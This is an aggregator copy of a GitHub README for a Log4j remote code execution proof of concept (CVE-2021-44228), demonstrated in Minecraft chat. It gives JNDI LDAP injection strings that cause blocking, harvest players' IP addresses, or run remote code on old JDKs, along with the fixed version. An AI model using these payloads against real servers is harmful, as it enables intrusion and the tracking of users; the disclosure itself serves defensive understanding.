11
GitHub - HyCraftHD/Log4J-RCE-Proof-Of-Concept: Log4j-RCE (CVE-2021-44228) Proof...
source link: https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Log4J-RCE-Proof-Of-Concept (CVE-2021-44228)
This is a proof of concept of the log4j rce.
Here are some links for the CVE-2021-44228:
This bug affects nearly all log4j2 and maybe log4j1 versions. The recommended version to use is 2.15.0 which fixes the exploit.
Demonstration with minecraft (which uses log4j2)
Lag or sending serialized data
- Paste
${jndi:ldap://127.0.0.1/e}in the chat. If there is an open socket on port389logj4 tries to connect and blocks further communiction until a timeout occurs. - When using this proof of concept exploit, the log in the console will log
THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT!which is a serialized string object from the ldap server.
- Additionally the malicious ldap server receives every ip address where the message is logged. This means that ip adresses of players on a server can be collected which this exploit.
- Paste
${jndi:ldap://127.0.0.1/exe}in the chat. If-Dcom.sun.jndi.ldap.object.trustURLCodebase=trueis set to true the remote code execution will happen.
- Fortunately modern jdks disable remote class loading by default. (https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)
- Old versions may still allow this!!
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK